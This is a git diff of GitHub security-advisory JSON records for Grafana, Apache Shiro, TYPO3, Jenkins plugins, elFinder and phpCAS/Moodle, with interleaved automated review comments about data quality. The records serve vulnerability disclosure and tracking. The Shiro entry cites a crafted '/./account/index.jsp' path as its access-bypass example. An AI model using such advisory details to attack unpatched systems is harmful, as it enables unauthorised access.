diff --git a/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json b/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json
index ee611b6870f81..655363bf3c473 100644
--- a/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json
+++ b/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json
@@ -32,10 +32,7 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 2.1.0"
- }
+ ]
 },
 {
 "package": {
@@ -54,10 +51,7 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 3.1.0"
- }
+ ]
 }
 ],
 "references": [
@@ -65,6 +59,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11830"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/phar-stream-wrapper/CVE-2019-11830.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/TYPO3/phar-stream-wrapper"
@@ -77,6 +75,22 @@
 "type": "WEB",
 "url": "https://github.com/TYPO3/phar-stream-wrapper/releases/tag/v3.1.1"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/65ODQHDHWR74L6TCAPAQR5FQHG6MCXAW/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AUEXS4HRI4XZ2DTZMWAVQBYBTFSJ34AR/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U6JX7WR6DPMKCZQP7EYFACYXSGJ3K523/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://typo3.org/security/advisory/typo3-psa-2019-008"
+ },
 {
 "type": "WEB",
 "url": "https://typo3.org/security/advisory/typo3-psa-2019-008/"
diff --git a/advisories/github-reviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json b/advisories/github-reviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json new file mode 100644
index 0000000000000..0f72f3940e26b
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json
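Review bot: The added reference `https://typo3.org/security/advisory/typo3-psa-2019-008` in the last hunk of GHSA-3hxw-g85p-qgxm duplicates the entry that immediately follows it, `https://typo3.org/security/advisory/typo3-psa-2019-008/`, differing only by the trailing slash; one of the two should be dropped rather than both kept. The first two hunks of this file delete `database_specific.last_known_affected_version_range` (`<= 2.1.0` and `<= 3.1.0`) from both affected entries, but the `events` arrays of those entries begin outside the hunks, so I cannot confirm from here that each range still carries a `fixed` bound to replace the removed one. The Fedora list URLs here encode the address as `package-announce%40lists.fedoraproject.org` while the ones added in GHSA-3jq7-8ph8-63xm use a literal `@`; a single form across the database helps reference de-duplication.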
@@ -0,0 +1,82 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3jq7-8ph8-63xm",
+ "modified": "2024-02-01T21:46:49Z",
+ "published": "2022-05-24T17:16:53Z",
+ "aliases": [
+ "CVE-2020-12458"
+ ],
+ "summary": "Grafana information disclosure",
+ "details": "An information-disclosure flaw was found in Grafana. The database directory `/var/lib/grafana` and database file `/var/lib/grafana/grafana.db` are world readable. This can result in exposure of sensitive information (e.g., cleartext or encrypted datasource passwords).",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/grafana/grafana"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "7.2.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12458"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/grafana/grafana/issues/8283"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/grafana/grafana/commit/102448040d5132460e3b0013e03ebedec0677e00"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2020-12458"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20200518-0001/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-312",
+ "CWE-732"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T21:46:49Z",
+ "nvd_published_at":
"2020-04-29T16:15:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json b/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json new file mode 100644
index 0000000000000..02fa8ace3c9fd
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json
@@ -0,0 +1,78 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3jx9-mgwx-4q83",
+ "modified": "2024-02-07T22:57:26Z",
+ "published": "2022-05-14T02:42:51Z",
+ "aliases": [
+ "CVE-2010-3863"
+ ],
+ "summary": "Apache Shiro Path Traversal vulnerability",
+ "details": "Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.apache.shiro:shiro-root"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.1.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3863"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62959"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/apache/shiro"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20101120091718/http://www.vupen.com/english/advisories/2010/2888"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20101129043410/http://secunia.com/advisories/41989"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20110929165859/http://www.securityfocus.com/bid/44616"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20161017000748/http://www.securityfocus.com/archive/1/514616/100/0/threaded"
+ },
+ {
+ "type": "WEB",
+ "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-11/0020.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T22:57:26Z",
+ "nvd_published_at": "2010-11-05T17:00:00Z"
+ }
+} \ No newline at end of file
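Review bot: The only affected package in GHSA-3jx9-mgwx-4q83 is `org.apache.shiro:shiro-root`, which is the project's parent/aggregator POM rather than an artifact applications normally declare as a dependency; builds that depend on `org.apache.shiro:shiro-core` or `shiro-web` would not be matched by this entry, so the advisory may never alert the consumers it is meant for. If that is not intentional, adding an `affected` entry for `org.apache.shiro:shiro-core` with the same `"introduced": "0"` / `"fixed": "1.1.0"` range (and the same for `shiro-web` if confirmed) would cover them. The `details` also name JSecurity 0.9.x as affected, but no Maven coordinates for it are listed; if it is resolvable on Maven Central it should get its own entry, otherwise a short note in `details` that it is not tracked here would avoid confusion.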
diff --git a/advisories/github-reviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json b/advisories/github-reviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json new file mode 100644
index 0000000000000..9db1520401eed
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json
@@ -0,0 +1,136 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3mqf-fwc6-vwqw",
+ "modified": "2024-02-07T23:43:12Z",
+ "published": "2022-05-17T01:55:58Z",
+ "aliases": [
+ "CVE-2010-5098"
+ ],
+ "summary": "TYPO3 Cross-site scripting (XSS) vulnerability in the FORM content object ",
+ "details": "Cross-site scripting (XSS) vulnerability in the FORM content object in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-frontend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.2.0"
+ },
+ {
+ "fixed": "4.2.16"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-frontend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.4.0"
+ },
+ {
+ "fixed": "4.4.5"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-frontend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.3.0"
+ },
+ {
+ "fixed": "4.3.9"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5098"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TYPO3/typo3/commit/3c5d15233ca765fabeac21f0600d831595d31cd8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TYPO3/typo3/commit/4e8bd7a15681c0683196984e871f60f0646ea2b6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TYPO3/typo3/commit/6d17fe7cef30b09a65e0c2d54f8871ec3ddfc67e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64179"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/TYPO3-CMS/frontend"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20101229020821/http://secunia.com/advisories/35770"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20111025222220/http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-022/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20111223211753/http://www.securityfocus.com/bid/45470"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T23:40:36Z",
+ "nvd_published_at": "2012-05-21T20:55:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json b/advisories/github-reviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json new file mode 100644
index 0000000000000..f9ee59e0ee8d2
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json
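Review bot: The three `typo3/cms-frontend` ranges in GHSA-3mqf-fwc6-vwqw are listed as 4.2.x, 4.4.x, 4.3.x; reordering them to 4.2.x, 4.3.x, 4.4.x would match the order in `details` and the way the other TYPO3 advisories in this commit list their ranges, which makes later edits to one branch easier to review. `database_specific.severity` is `LOW` for an authenticated stored XSS, while the other XSS advisories added here (GHSA-33jj-92px-m4g7, GHSA-39vm-rvwh-q86j, GHSA-3gm8-32vv-q8mp) are `MODERATE` with no `severity` vector either; if the lower rating is deliberate it would help to have the reasoning recorded somewhere, otherwise it looks like an inconsistency. The file starts in the previous hunk line, so the first ranges are reviewed only as far as they are visible here.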
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3q6p-r6rr-266x",
+ "modified": "2024-01-30T22:10:41Z",
+ "published": "2022-05-14T00:58:29Z",
+ "aliases": [
+ "CVE-2017-1000113"
+ ],
+ "summary": "Jenkins Deploy to container Plugin stored plain text passwords in job configuration",
+ "details": "The Deploy to container Plugin stored passwords unencrypted as part of its configuration. This allowed users with Jenkins master local file system access, or users with Extended Read access to the jobs it is used in, to retrieve those passwords. The Deploy to container Plugin now integrates with Credentials Plugin to store passwords securely, and automatically migrates existing passwords.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:deploy"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.13"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.12"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000113"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2017-08-07/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:10:41Z",
+ "nvd_published_at": "2017-10-05T01:29:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json b/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json
index 6a87fcee42f24..876b80330d887 100644
--- a/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json
+++ b/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json
@@ -1,13 +1,13 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3qhm-qfj3-4rrx",
- "modified": "2024-01-10T19:31:04Z",
+ "modified": "2024-02-06T18:00:03Z",
 "published": "2022-05-13T01:06:16Z",
 "aliases": [
 "CVE-2019-6257"
 ],
 "summary": "elFinder Server Side Request Forgery (SSRF)",
- "details": "A Server Side Request Forgery (SSRF) vulnerability in elFinder before 2.1.46 could allow a malicious user to access the content of internal network resources. This occurs in `get_remote_contents()` in `php/elFinder.class.php`.",
+ "details": "A Server Side Request Forgery (SSRF) vulnerability in elFinder before 2.1.49 could allow a malicious user to access the content of internal network resources. This occurs in `get_remote_contents()` in `php/elFinder.class.php`.",
 "severity": [
 {
 "type": "CVSS_V3",
@@ -28,7 +28,7 @@
 "introduced": "0"
 },
 {
- "fixed": "2.1.46"
+ "fixed": "2.1.49"
 }
 ]
 }
@@ -44,13 +44,21 @@
 "type": "WEB",
 "url": "https://github.com/Studio-42/elFinder/commit/2f522db8f037a66ce9040ee0b216aa4a0359286c"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/studio-42/elfinder/CVE-2019-6257.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/Studio-42/elFinder"
 },
 {
 "type": "WEB",
- "url": "https://github.com/Studio-42/elFinder/blob/68ec63c0aeca3963101aca8f842dc9f2e4c4c6d3/Changelog"
+ "url": "https://github.com/Studio-42/elFinder/blob/2.1.49/Changelog"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Studio-42/elFinder/releases/tag/2.1.49"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json b/advisories/github-reviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json new file mode 100644
index 0000000000000..dbbc544d9800a
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rrg-p8xc-3457", + "modified": "2024-01-30T22:39:03Z", + "published": "2022-05-14T03:33:40Z", + "aliases": [ + "CVE-2018-1000113" + ], + "summary": "Stored cross-site scripting vulnerability in Jenkins TestLink Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins TestLink Plugin 2.12 and earlier in TestLinkBuildAction/summary.jelly and others that allow an attacker who can control e.g. TestLink report names to have Jenkins serve arbitrary HTML and JavaScript", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:testlink" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.12" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000113" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-731" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:39:03Z", + "nvd_published_at": "2018-03-13T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json b/advisories/github-reviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json new file mode 100644 index 0000000000000..1fce5ffac1d2a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vcx-w94h-68vg", + "modified": "2024-01-30T23:17:57Z", + "published": "2022-05-14T03:40:06Z", + "aliases": [ + "CVE-2018-1000055" + ], + "summary": "XXE vulnerability in Jenkins Android Lint Plugin", + "details": "Jenkins Android Lint Plugin 2.5 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:android-lint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000055" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-05/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:17:57Z", + "nvd_published_at": "2018-02-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json b/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json index 5a036c7c11334..5414d17072b4d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json +++ b/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json 
@@ -44,6 +44,10 @@
       "type": "WEB",
       "url": "https://github.com/Studio-42/elFinder/commit/374c88d7030eb92749267e17a4af21cc7520efa5"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/studio-42/elfinder/CVE-2019-9194.yaml"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/Studio-42/elFinder"
diff --git a/advisories/github-reviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json b/advisories/github-reviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json
new file mode 100644
index 0000000000000..13a37cf96fcac
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-449p-7c3p-vf7g", + "modified": "2024-01-30T22:30:06Z", + "published": "2022-05-13T01:25:42Z", + "aliases": [ + "CVE-2019-1003082" + ], + "summary": "CSRF vulnerability in Jenkins Gearman Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:gearman-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003082" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:30:06Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json b/advisories/github-reviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json new file mode 100644 index 0000000000000..0f8c48c79589a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json 
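Review bot: This record carries a `fixed` event (`"fixed": "0.4.0"`) but, unlike the other new Jenkins records in this batch that have a `fixed` event (GHSA-3q6p-r6rr-266x, GHSA-3rrg-p8xc-3457, GHSA-3vcx-w94h-68vg, GHSA-477r-v22q-r42f, GHSA-5293-3fgp-cr3x), it omits `database_specific.last_known_affected_version_range` on the affected entry. If the convention is to record the hint whenever an upper bound is known, add it after `"ranges"`; the value is not derivable from this hunk and would have to come from the linked Jenkins advisory. Separately, the `http://www.securityfocus.com/bid/107790` and `http://www.openwall.com/…` references are plain-HTTP links, and the SecurityFocus BID host appears to no longer serve these pages; an archived copy would be the more durable reference, and the same applies to the identical links in GHSA-45fr-w365-f7pm, GHSA-492x-gfqx-wpf3, GHSA-4mvc-33v7-cqc3, GHSA-56ff-m6pv-8594 and GHSA-5293-3fgp-cr3x.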
@@ -0,0 +1,116 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45ch-hxgr-vx8j", + "modified": "2024-02-07T22:50:39Z", + "published": "2022-05-13T01:13:09Z", + "aliases": [ + "CVE-2010-1618" + ], + "summary": "phpCAS client library and Moodle Cross-site Scripting vulnerability", + "details": "Cross-site scripting (XSS) vulnerability in the phpCAS client library before 1.1.0, as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled in an error message.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "apereo/phpcas" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1618" + }, + { + "type": "WEB", + "url": "https://github.com/apereo/phpCAS/commit/021633112198b37555b35340cde884d1016d9e47" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apereo/phpCAS" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html" + }, + { + "type": "WEB", + "url": "http://moodle.org/security/" + }, + { + "type": "WEB", + "url": "http://www.ja-sig.org/issues/browse/PHPCAS-52" + }, + { + "type": "WEB", + "url": "http://www.ja-sig.org/wiki/display/CASC/phpCAS+ChangeLog" + }, + { + "type": "WEB", + "url": "http://www.vupen.com/english/advisories/2010/1107" + } + ], + 
"database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:50:39Z", + "nvd_published_at": "2010-04-29T21:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json b/advisories/github-reviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json new file mode 100644 index 0000000000000..c69fcec397e73 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45fr-w365-f7pm", + "modified": "2024-01-30T21:43:38Z", + "published": "2022-05-13T01:17:45Z", + "aliases": [ + "CVE-2019-1003053" + ], + "summary": "Jenkins HockeyApp Plugin stores credentials in plain text", + "details": "Jenkins HockeyApp Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:hockeyapp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003053" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-839" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:43:38Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json b/advisories/github-reviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json new file mode 100644 index 0000000000000..d78cc48c24fd6 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json 
